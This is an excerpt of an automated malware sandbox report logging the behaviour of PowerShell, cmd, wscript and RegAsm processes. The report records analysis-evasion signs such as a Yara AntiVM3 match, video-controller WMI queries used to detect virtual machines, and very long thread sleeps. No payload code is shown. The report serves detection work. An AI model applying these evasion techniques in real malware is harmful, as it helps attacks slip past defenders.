Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6276, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1400000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1300000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3060000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 5060000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3070000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E30000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1739	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1438	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3710	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6103	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5840	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1658	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6449	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 547	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7742	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 661	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8978	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8489
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 865
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5047
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6741
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7990
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6859
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 590
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5624
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8366
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4233
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9807
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9147

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828	Thread sleep count: 3710 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364	Thread sleep count: 6103 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep count: 5840 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep count: 1658 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 428	Thread sleep count: 6449 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 428	Thread sleep count: 547 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep count: 7742 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep count: 661 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 8978 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep count: 9056 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep count: 38 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 8489 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep count: 393 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep count: 4007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 1290 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 93 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992	Thread sleep count: 3529 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952	Thread sleep count: 865 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 412	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep count: 2672 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep count: 252 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep count: 984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244	Thread sleep count: 5406 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 6403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160	Thread sleep count: 153 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3584	Thread sleep count: 5047 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s
